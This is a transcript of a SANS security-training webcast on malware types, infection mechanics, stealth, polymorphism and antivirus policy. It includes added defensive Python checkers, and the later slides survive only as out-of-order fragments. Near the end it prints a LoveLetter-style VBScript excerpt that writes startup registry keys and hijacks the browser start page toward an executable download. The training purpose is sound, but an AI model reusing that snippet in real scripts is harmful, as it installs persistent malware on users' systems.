Malicious Software - SANS GIAC LevelOne
© 2000, 2001
1
Malicious Software
(Malware)
SANS GIAC LevelOne
Security Essentials
My name is Fred Kerby. Today's webcast is entitled "Malicious Software" - shown on the first slide.
It's a part of the SANS Security Essentials series.
Picture this - the trade press is all abuzz with warnings of a new killer virus, child of Chernobyl.
Recall that Chernobyl struck on April 26, 1999. In Korea alone, it affected as many as a million
computers, causing more than $250 million in damages. The boss has just come down with a
magazine article in hand and has told you to drop everything. You have three days to ensure the
organization is ready before “child of Chernobyl” day. Is this real or a hoax? What do you do to
find out? How do you meet the boss' demands to get anti-viral software installed and updated as
needed? Stay tuned for answers to these questions and more…
Of course this course isn’t going to solve all your problems if you suddenly get hit and have no plan
of action or procedures in place. So you are going to need to apply what you learn here.
Objectives
• Malicious code
• Virus and hoax information
• Virus types and methods
• Organizational AV policy
• Desktop anti-viral care and feeding
Our next slide (entitled "Objectives") shows what we will be discussing during this Level One briefing.
At the completion of this course, the student will be familiar with these core concepts of anti-viral
protection.
What is malicious software? How does it spread? What are some of the characteristics of viruses?
What is the difference between a virus and a hoax? Where can I go to get more information on them?
Does my organization have an anti-viral policy? What does it say? Is it up to date?
What is anti-viral software?
What is involved in the care and feeding of desktop anti-viral software?
Malicious Software (Malware)
• Viruses
• Worms
• Trojan horses
• Malicious applets
• Majority Microsoft-specific
Let's move to the next slide, "Malicious Software".
Malware is a generic term for a number of different types of malicious code - viruses, worms, Trojan horses and
malicious applets. First, we will define what these things are.
A virus is a piece of parasitic code (or program) written specifically to execute on behalf of the user without the
user's permission (or knowledge). It is parasitic in that it attaches itself to files (or boot sectors) and then
replicates, causing the spread to continue. Some viruses do little more than replicate and serve as a nuisance;
others can do serious damage such as affecting programs or degrading system performance (the virus payload).
Never assume that a virus is harmless and leave it intact. We will look at the various types of viruses in the slides
to follow.
A worm is a self-contained program (or set of programs), that is able to spread functional copies of itself to other
computer systems (usually via a network). Host-computer worms are entirely contained on their host computer.
Host-computer worms that delete from one host upon propagation to a new host are called rabbits - they ‘hop’
around a network. Some worms run in multiple parts on many hosts. These worms are called network worms.
A network worm with one coordinating segment and many client sub-segments is termed an octopus! Note:
malicious code is called a worm when it requires no specific action on the part of the user to enable infection and
propagation. It just spreads. If the code requires the user to open an email or load a screen saver or take some
other action, then it is called a virus.
Trojan horses are programs with an intended action that is not documented or revealed. Typically, Trojan
horses masquerade as some other harmless or trusted program. A well-known Trojan horse is Back Orifice.
Malicious applets are applets that attack the local system of a Web surfer and involve denial of service, invasion
of privacy, and annoyance. Malicious applets are distinguished from attack applets that exploit vulnerabilities in
the implementation of the Java security model.
It is interesting to note that of the 60,000 or so known viruses, worms etc., about 55,000 of them are Microsoft-specific
(Gene Spafford). Care is needed here because this statistic does not mean that systems such as Linux,
Unix or Mac are immune - there are just fewer examples found there. We usually think of infection via the network
and floppy disks, but CD-ROMs are notorious for hosting malware. Just think of the damage that could be done
with a music CD. How about infecting a Windows system just because auto-run is enabled?
Virus Types (1)
• File infectors / Program viruses
– Direct-action
– Memory resident
– Cluster or File system virus
• Potential to spread over networks
Go to the slide entitled “Virus Types (1)” and let's take a look at viruses. Viruses are identified by
the ways they infect computers. Usually, a virus falls into one of the following three categories:
program viruses, boot record infectors, or macro viruses.
For the next few slides we will focus on program viruses. A program virus gets activated when the
program is executed (or run). The virus is loaded into the computer memory and then proceeds to
wreak havoc. The results of the virus triggering may not be obvious immediately, as the virus may
have a built-in delay (an event-triggered virus). First signs of infection can include files being
saved with malformed or improper names.
Program viruses are usually attached to files such as COM or EXE files, but can infect any
executable or interpretable file - overlays, drivers, system files, or binary files. Examples also exist
of viruses that infect C source code such that the compiled executable is infected!
Direct-action file infectors find one or more selected programs to infect each time the infected
program is run. Resident viruses install to the system service area of RAM and infect new
programs when they are run. Cluster viruses infect program files indirectly by modifying file
system structures such as the file allocation table. These viruses are loaded by the OS before the
target program because the file system points to the virus first.
Program file viruses need to be executed to activate and spread. As well as being run locally, users
can run infected programs from servers, download and run infected files, or execute mail
attachments. These viruses therefore have the potential to spread from program to program on a
single host, and find their way to infect new programs on different hosts by being spread by network
users.
COM Program Infectors
[Figure: COM program infectors. Three layouts are shown side by side: the original COM program (START to END); a prepended virus, with VIRUS placed ahead of the COM code; and an appended virus, with a JUMP at the start of the COM code leading to VIRUS at the end. Numbered steps 1 to 6 trace the order of execution.]
Our next slide is entitled “COM program infectors”.
Now we’ll take a look at how program files are actually infected.
COM file viruses attach themselves to their target in one of three ways - by prepending to the
beginning, by appending to the end, or by overwriting part of the file.
A prepending virus gains control when the first instruction of the infected COM file is executed.
The virus runs and then passes control to the original program. Because of this, users may not notice
anything different.
An appending virus writes an instruction to jump at the first instruction in the file. This jump will
take execution to the virus which later returns control to the COM program.
Overwriting viruses simply write their code to the beginning of the file. These viruses therefore
destroy the original program. More sophisticated overwriting viruses will make a copy of the
portion that they overwrite which can later be executed - all in an effort to remain covert.
EXE Program Infectors
[Figure: EXE program infectors. Left, the original EXE program: a Header whose CS:IP entry points to START in the Load Image, with a SIZE field covering the image. Right, the infected EXE program: the header now holds VCS:VIP pointing to VIRUS START at the end of the image, and SIZE+V covers the enlarged image; the original START and CS:IP are preserved so the virus can hand control back.]
The next slide, “EXE program infectors”, shows how an infected executable is structured.
Executables consist of two parts - the header, and the load image. The header contains, among other
things, a pointer that points to the first instruction to be executed in the load image. The pointer
(CS:IP) consists of a pair of values - the code segment (CS), and instruction pointer (IP). A header
entry named SIZE stores the size of the load image.
When the executable is infected, these header entries are altered. CS:IP becomes VCS:VIP and now
points to the start of the appended viral code. SIZE increases to VSIZE and measures the size of the
infected load image. Running the infected program will cause a jump to the virus load image. When
completed, the viral code hands execution back to the original program.
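The two layouts just described can be recognised from the file alone. The following Python script is an added example, not code from the webcast or from SANS: it decodes the first instruction of a COM file (a JMP rel16 into the tail of the file is what an appending infector leaves behind) and the CS:IP and size fields of an MZ EXE header (an entry point at the end of the load image is the VCS:VIP case on the slide). The sample files, the build_mz helper and the 50 % tail threshold are constructions for the demonstration; legitimate programs also start with a JMP, so the result is a lead for closer inspection, not a verdict.

```python
# Added example (not code from the SANS webcast): entry-point checks that
# recognise the layout an appending infector leaves behind in DOS COM and
# MZ EXE files. All sample images below are constructed byte strings.
import struct

MZ_HEADER = struct.Struct("<2s13H")   # e_magic .. e_ovno, 28 bytes


def analyze_com(data: bytes, tail_fraction: float = 0.5) -> dict:
    """Flag a COM file whose first instruction is a JMP rel16 (opcode E9h)
    into the tail of the file, the signature of an appended body.
    Legitimate programs also start with a JMP, so treat this as a lead."""
    result = {"starts_with_jmp": False, "jump_target": None, "suspicious": False}
    if len(data) < 3 or data[0] != 0xE9:
        return result
    # COM images load at CS:0100h; rel16 is relative to the next instruction,
    # so the target's file offset is simply 3 + rel.
    rel = struct.unpack_from("<h", data, 1)[0]
    target = 3 + rel
    result["starts_with_jmp"] = True
    if not 0 <= target < len(data):
        return result
    result["jump_target"] = target
    result["suspicious"] = target >= len(data) * tail_fraction
    return result


def analyze_exe(data: bytes, tail_fraction: float = 0.5) -> dict:
    """Decode the MZ header fields the slide names (CS:IP and SIZE) and
    flag an entry point that sits in the tail of the load image."""
    if len(data) < MZ_HEADER.size:
        raise ValueError("too short for an MZ header")
    fields = MZ_HEADER.unpack_from(data, 0)
    magic, e_cblp, e_cp, _crlc, e_cparhdr = fields[:5]
    e_ip, e_cs = fields[10], fields[11]
    if magic not in (b"MZ", b"ZM"):
        raise ValueError("not an MZ executable")
    # SIZE: e_cp pages of 512 bytes, the last one partial (e_cblp bytes) if non-zero.
    file_size = e_cp * 512 - ((512 - e_cblp) if e_cblp else 0)
    image_size = file_size - e_cparhdr * 16   # header is e_cparhdr paragraphs
    entry = e_cs * 16 + e_ip                  # CS:IP as an offset into the image
    return {
        "image_size": image_size,
        "entry_offset": entry,
        "suspicious": image_size > 0 and entry >= image_size * tail_fraction,
    }


def build_mz(image: bytes, e_cs: int = 0, e_ip: int = 0) -> bytes:
    """Constructed sample (hypothetical helper): a 32-byte, two-paragraph MZ
    header in front of the given load image, with SIZE fields set to match."""
    hdr_paras = 2
    total = hdr_paras * 16 + len(image)
    e_cp = (total + 511) // 512
    e_cblp = total % 512
    header = MZ_HEADER.pack(b"MZ", e_cblp, e_cp, 0, hdr_paras, 0, 0xFFFF,
                            0, 0, 0, e_ip, e_cs, 0x1C, 0)
    return header.ljust(hdr_paras * 16, b"\0") + image


# Constructed samples: a 200-byte COM program, and the same program with its
# first three bytes replaced by a JMP to a 100-byte tail appended at offset 200.
CLEAN_COM = bytes([0xB8, 0x00, 0x4C]) + b"\x90" * 197
APPENDED_COM = b"\xE9" + struct.pack("<H", 197) + b"\x90" * 197 + b"\xCC" * 100
# A 512-byte load image entered at CS:IP = 0, and the same image with 128 bytes
# appended and the header entry moved to VCS:VIP = 0020h:0000h (offset 512).
CLEAN_EXE = build_mz(b"\x90" * 512)
INFECTED_EXE = build_mz(b"\x90" * 512 + b"\xCC" * 128, e_cs=0x20, e_ip=0)

if __name__ == "__main__":
    for name, blob, fn in [("clean COM", CLEAN_COM, analyze_com),
                           ("appended COM", APPENDED_COM, analyze_com),
                           ("clean EXE", CLEAN_EXE, analyze_exe),
                           ("infected EXE", INFECTED_EXE, analyze_exe)]:
        print(f"{name:13s} {fn(blob)}")
```

Run on real files the checks are only as good as the threshold: an overlay-bearing program or one that jumps over an initial data area will also trip them, which is why scanners pair a layout heuristic like this with signatures and, for the stealth cases discussed later, with memory scanning.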
Virus Types (2)
• Boot-record infectors
– Floppy boot record (FBR)
– Master boot record (MBR)
– DOS boot sector (DBS or PBR)
– No network spreading potential
• Multipartite
– Potential to spread over networks
Let’s go to the slide entitled “Virus Types (2)”. The next virus we'll review is the boot infector.
Every disk has a boot sector (regardless of whether or not it is actually bootable). When a computer
is powered up, it looks for boot information according to a list provided by the computer BIOS. If
any of the media in the drives specified in the BIOS list have a boot sector virus, the infection will
get transferred to the boot drive. Once the infection is complete, the virus will get loaded into
memory at startup. From there, the virus can be spread to every disk that is read after startup.
Results of the infection can range from nuisance (if at all) to destruction of boot information, to need
for a complete format of the hard disk.
Floppy disks contain a floppy boot record (FBR) which can harbor a virus. If a system is booted
from such a floppy the virus will load and infect the hard disk. Viruses on hard disks infect either
the master boot record (MBR) or the partition boot record (PBR), sometimes called the DOS boot
sector (DBS). The MBR is the first place the BIOS looks when booting from a hard drive. If a
virus is present it can seize control of the hardware before the operating system even sees the light of
day! PBRs are executed after the bootstrap program in the MBR passes control to the active
partition. Operating system files that are present on a partition are loaded according to instructions
in the PBR. As with an MBR infection, if a virus is present it will be loaded before the operating
system.
Multipartite viruses are hybrids of boot infectors and program viruses. When executed as a
program, boot sectors become infected, and vice versa - if multipartite-infected media are booted,
program files get infected. Multipartite viruses provide a mechanism by which boot-sector viruses
can get around on networks (they travel as program files). Boot-sector viruses cannot on their own
infect across networks. This is because the network protocols do not support sector level operations.
Virus Types (3)
• Macro viruses
– Targets are data files (e.g. *.doc)
– Written in 'macro languages' (e.g. Melissa macro virus)
– Visual Basic Editor
• High network spreading potential!
Our next slide is entitled “Virus Types (3)”. A macro virus is malicious code contained in a set of
instructions that are included within an application such as a word processor or spreadsheet. Unlike
program viruses, which target executables, macro viruses target data files. Once the macro
containing the infection is loaded onto your computer, it can infect other files (such as the normal.dot
template for Microsoft Word) or cause itself to be propagated to other users automatically. A typical
example is the Melissa macro. It caused a document containing the macro to be mailed
electronically to other email users.
The activated macro virus is limited only by the capabilities of the ‘macro language’ being used.
Microsoft macros, written in Visual Basic, can access all host application features (e.g. Word) and
many OS features (Windows). For example, in Word or Excel, try opening <Tools-Macro-Visual
Basic Editor>. This opens a Visual Basic session enabling complex macro design. Imagine the
potential damage from commands such as open, kill (delete), or rmdir!
Macro viruses can spread as email attachments. Users open an infected attachment, the virus reads
the address book and mails itself on. For this reason, macro viruses have a huge potential to spread
over networks.
Virus Protection Techniques 1
• Stealthing
– virus attempts to hide or 'cloak' itself
– hiding from anti-virus software
– read stealthing
– size stealthing
• Need to scan memory to detect
Let’s go to the slide entitled “Virus Protection Techniques (1)”. To avoid detection, or being picked
up during an anti-virus scan, sophisticated viruses employ techniques to cover their presence or
tracks. When active, the virus builds itself a “cloaking device”.
Stealthing is achieved in a number of ways. The virus, through being memory resident (or hooked
into system services), monitors system function calls. When a system call is made, it is intercepted
by the virus and the virus tells a lie back to the system. In this way the system is deceived.
Read stealthing involves monitoring attempts to read or write infected files (e.g. open, read, or
close). If an infected program file is opened and read, the virus might give back to the system
information from a backed-up copy of the original file - the infection is invisible! Another form of
read stealthing monitors direct access to disk sectors. Even if low level calls are made to read the
master boot record (e.g. BIOS Interrupt 13), the virus will interject.
Size stealthing viruses monitor calls to directory entries and other parts of the file system. If the
operating system were to inquire as to the size of an infected file, the call is intercepted and a lie is
told.
Stealthing prevents or hinders detection by examining disks. Anti-virus scanning software must
therefore resort to scanning the system portions of RAM to detect these viruses.
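An integrity checker is the disk-examining tool that read and size stealthing set out to deceive, so it is worth seeing what such a tool actually records. The Python below is an added example, not part of the webcast or any product it mentions: it stores the size and SHA-256 digest of every file under a directory and, on a later run, reports additions, removals and modifications, plus any file whose directory-reported size disagrees with the bytes actually read. The demo() scenario, its file names and contents are constructed. It tells the truth only when run from an environment the virus does not control, such as a clean boot, which is exactly why the slide insists on scanning memory as well.

```python
# Added example, not from the SANS webcast: a minimal on-disk integrity
# checker. Baseline once from a clean system, store the result offline, and
# re-check later. All file names and contents in demo() are constructed.
import hashlib
import json
import os
import tempfile


def fingerprint(path: str) -> dict:
    """Record the size the OS reports and a digest of what we actually read.
    Both are kept so that a disagreement between them is itself a finding."""
    h = hashlib.sha256()
    read = 0
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
            read += len(chunk)
    return {"size": os.path.getsize(path), "read": read, "sha256": h.hexdigest()}


def build_baseline(root: str) -> dict:
    """Map each file (relative to root) to its fingerprint."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = fingerprint(full)
    return baseline


def verify(root: str, baseline: dict) -> dict:
    """Compare the tree under root against a stored baseline."""
    current = build_baseline(root)
    findings = {"added": [], "removed": [], "modified": [], "size_mismatch": []}
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline:
            findings["added"].append(rel)
        elif rel not in current:
            findings["removed"].append(rel)
        else:
            if current[rel]["sha256"] != baseline[rel]["sha256"]:
                findings["modified"].append(rel)
            # Only fires if the directory entry and the file data disagree.
            if current[rel]["size"] != current[rel]["read"]:
                findings["size_mismatch"].append(rel)
    return findings


def demo() -> dict:
    """Constructed scenario: baseline two files, then grow one (as an
    appending infector would), delete one and drop in a new one."""
    with tempfile.TemporaryDirectory() as root:
        prog = os.path.join(root, "PROG.COM")
        util = os.path.join(root, "UTIL.EXE")
        with open(prog, "wb") as fh:
            fh.write(b"\xB8\x00\x4C" + b"\x90" * 197)
        with open(util, "wb") as fh:
            fh.write(b"MZ" + b"\x00" * 62)
        snapshot = json.dumps(build_baseline(root))   # what you would store offline
        with open(prog, "ab") as fh:
            fh.write(b"\xCC" * 100)                    # file grows by 100 bytes
        os.remove(util)
        with open(os.path.join(root, "NEW.SYS"), "wb") as fh:
            fh.write(b"\x00" * 10)
        return verify(root, json.loads(snapshot))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Keep the snapshot on write-protected or removable media: a baseline stored on the disk being checked is as exposed to the virus as the files it describes.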
Virus Protection Techniques 2
• Polymorphism
– poly = many, morph = form
– encryption/decryption routines
– mutation engines
• Makes a scanner's job a lot harder
Our next slide is “Virus Protection Techniques (2)”. Now let's look at another protection technique -
polymorphism. Polymorphism literally means many forms. A polymorphic virus therefore has
many and varying forms - very biological indeed. If a virus is continually changing the way it looks,
the job of the anti-virus scanner is made a lot more difficult.
Viral polymorphism is achieved by using a mechanism that varies the code used to decrypt, or
unsheath, the virus into its active state. The inactive virus is encrypted so that it cannot be easily
detected by scanning for common strings (in fact, the code of the virus body will look like random
data).
If the encryption and decryption routines did not change from virus to virus, then a scanner could
detect the virus by detecting the decryption code. Therefore, polymorphic viruses change their
decryption routines on the fly. These changes might be made by a mutation engine built into the
virus that is linked to a random number generator. Alternatively, some mechanism might exist to
vary the sequence of instructions, or insert redundant instructions into the mutating routine. The
decryption routines still perform their functions, but the way they look is different.
The common cold is a biological example of viral polymorphism - however, the cold virus varies in
both form and function.
[The rest of the transcript survives in this copy only as out-of-order excerpts. They are given below in slide order; [...] marks where an excerpt is cut off.]

Background
• Policy or Practice
• Need for guidance
• How it gets implemented
Let's go to the next slide – "Background". This is the first of three sections on Policy. The other two (covered in upcoming slides) are Scope and Responsibilities. There is some discussion as to whether we need a policy document or implementation guidance. The difference is that the policy [...]

[...] risk vectors that you might need to address in your document. Even if you don't have these vectors now, you might have them in the not-too-distant future. Be sure your policy will cover them as needed.

Roles and Responsibilities
• Acquisition/procurement
• Installation and updating
• How often to update
• Logfile review
• Reporting infections
Now [...]

[...] having a written document that describes what the organization is committed to protecting (desktops, servers, etc.), who is responsible for doing what (buying, installing, updating, cleaning up, reporting, etc.) and what standards must be met (performance criteria).

Anti-virus Software
• Activity monitoring programs
• Scanners
• Integrity checkers
• Remember "defense in depth"

[...] days"), I knew folks who would buy a site license and distribute the software on floppy diskettes. That may have been a viable option when the software fit on a single floppy, there weren't a lot of computers to protect, and the computers were not heavily networked. For the most part none of these conditions are true today. The two anti-viral software installation programs commonly used in the US Department [...]

[...] that software is running.
Let's go to the slide entitled "Installation". Once acquired, what's involved in getting the anti-viral protection loaded on your computer? Well, anti-viral products are easily installed by running a self-extracting program and using a setup wizard that allows a good degree of customization. For example, at set-up time, the software [...]

Desktop Care and Feeding
[...] Determined by your AV policy
• Updating – AV software needs to be told about new viruses
Let's turn to the next slide – "Desktop Care and Feeding". Note that these topics are applicable to server environments, but for the moment we will focus on clients. Configuration - what do we need to do to "tune" the software? We'll look at some example screen [...]
[...] within minutes and seconds. Therefore, it is necessary to keep our anti-virus databases well fed with regular updates. Do this manually, or use the automated 'live-update' features provided with software.

The next slide shows a screen shot from Norton Antivirus. Look at the configurable options. Scanner settings control what happens when you initiate [...]
[...] records to protect against unknown viruses. We can also select the buttons to display if prompted (Repair, Stop, Inoculate, and Continue).

The next slide shows the configuration options for McAfee's VShield software. Specifically, the options for the system scan filter are shown. The Detection tab lets us define the events that trigger scanning and [...]

You should be familiar with:
• Malicious software
• Virus and hoax information
• Organizational AV policy
• Desktop anti-viral principles, care and feeding
The penultimate slide (entitled "You should be familiar with:") shows what we discussed during this LevelOne briefing. Now you have answers to these questions: What is malicious software? How does it [...]

VBScript excerpt shown on the slides (the narration around it is missing from this copy); it writes run-at-startup registry values and changes the browser start page:

Set regedit = CreateObject("Wscript.Shell")
regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL", dirwin & "\Win32DLL.vbs"
regedit.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.badpage/WIN-BUGSFIX.exe"
regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.exe", tempdir & "\WIN-BUGSFIX.exe"
Posted: 24/01/2014, 09:20